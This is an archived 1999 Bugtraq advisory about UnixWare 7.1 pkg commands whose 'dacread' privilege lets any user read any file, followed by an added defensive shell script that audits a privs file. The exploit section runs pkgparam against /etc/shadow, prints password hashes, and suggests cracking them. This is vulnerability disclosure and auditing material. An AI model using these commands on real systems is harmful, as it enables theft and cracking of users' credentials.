Bugtraq mailing list archives

UnixWare and the dacread permission


From: btellier () USA NET (Brock Tellier)
Date: Fri, 3 Dec 1999 21:21:17 MST


Greetings,

OVERVIEW
Any user may read any file on the system.

BACKGROUND
Only UnixWare 7.1 has been tested.

DETAILS
As previously stated, UnixWare binaries gain additional privileges via
standard suid/sgid AND /etc/security/tcb/privs.  The majority of the UnixWare
"pkg" commands, such as pkginfo, pkgcat, pkgparam, etc., are vulnerable to a bug
which allows any user to read any file on the system as a result of their
additional "dacread" permission in the privs file.

The dacread permission allows a process to override the Discretionary Access
Controls (DAC) for read-only operations.  Basically, a process with the
dacread permission is able to bypass the mode bits and ownership on a file,
but only for reading it.  A process with the dacwrite permission can bypass mode
bits to write to or execute that file.

I'm pretty sure that the bugs I found in the pkg commands were introduced by
their addition to the privs file.  As far as I can tell, there is virtually no
reason for them to be able to read any file on the system.  

All around, this additional privilege thing, well, sucks.  Consider now that
the truss(1) command will allow the user to see any file i/o that happens
between a process and the system since it isn't suid/sgid.  Thus, if there is
*any* way that you can make pkg* read from a file, even if the output is never
printed, you can examine truss output to get the file's contents.

EXPLOIT
The worst offender of pkg* is pkgparam, which will print the contents of a
file to stdout, though I've been able to get most of the pkg programs to read
from /etc/shadow in one way or another and grab the contents with truss.

bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x    1 root     sys          166784 May 21  1999 /bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$ 
Now just concatenate the first field of /etc/passwd with this file and run
your favorite cracker.

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net
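The advisory's point is that the privs file, not the mode bits, decides which binaries can bypass DAC, so an administrator who wants to know the exposure on a box has to read that file rather than look for suid bits. The following audit script is an added example, not code from the original post or from SCO: it lists every entry in a privs-style file that carries a given privilege name. It assumes (this is an assumption, not the documented UnixWare 7 layout) that the file is line-oriented with the executable path as the first colon-separated field and the privilege names appearing in later colon- or comma-separated fields; adjust the awk split if the real layout differs. The sample file it runs on is constructed for the example.

```shell
#!/bin/sh
# Added audit example (not from the original post or from UnixWare):
# list binaries granted a named privilege (e.g. dacread) in a privs file.
# ASSUMPTION: one entry per line, executable path in the first ':'-separated
# field, privilege names in later fields separated by ':' or ','
# (e.g. "/bin/pkgparam:fixed:dacread"). Real UnixWare 7 layout may differ.

PRIVS_FILE="${PRIVS_FILE:-/etc/security/tcb/privs}"

# Print one path per line for every entry whose privilege fields contain
# the exact token $1; comment and blank lines are skipped, and the path
# itself is never searched, so "/usr/bin/dacreader" would not match.
list_priv_holders() {
    priv="$1"; file="$2"
    awk -F: -v p="$priv" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        {
            rest = substr($0, length($1) + 2)        # everything after the path
            n = split(rest, toks, /[:,]/)
            for (i = 1; i <= n; i++)
                if (toks[i] == p) { print $1; break }
        }' "$file"
}

# Number of holders of privilege $1 in file $2 (handy for a nightly check
# that compares against an expected baseline).
count_priv_holders() {
    list_priv_holders "$1" "$2" | wc -l | tr -d ' '
}

# Constructed sample privs file so the script runs offline; these lines are
# illustrative and are not copied from any real system.
SAMPLE="$(mktemp)"
cat > "$SAMPLE" <<'EOF'
# path:type:privileges   (assumed layout, constructed sample)
/bin/pkgparam:fixed:dacread
/bin/pkginfo:fixed:dacread,setuid
/usr/bin/passwd:fixed:dacwrite,setuid
/usr/bin/login:fixed:setuid
/usr/bin/dacreader:fixed:setuid
EOF

echo "Binaries holding dacread in $SAMPLE ($(count_priv_holders dacread "$SAMPLE")):"
list_priv_holders dacread "$SAMPLE"
echo "Binaries holding dacwrite in $SAMPLE ($(count_priv_holders dacwrite "$SAMPLE")):"
list_priv_holders dacwrite "$SAMPLE"
rm -f "$SAMPLE"

# On a real host, run the same check against the live file if it is readable.
if [ -r "$PRIVS_FILE" ]; then
    echo "Binaries holding dacread in $PRIVS_FILE:"
    list_priv_holders dacread "$PRIVS_FILE"
fi
```

On the constructed sample the dacread list is /bin/pkgparam and /bin/pkginfo, and the dacwrite list is /usr/bin/passwd only. Each path the script reports is one whose bugs turn into an any-file read (or write) regardless of its mode bits, so the list is the set of binaries that deserve the scrutiny the advisory gives pkgparam, and any entry that cannot justify the privilege is a candidate for having it removed.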
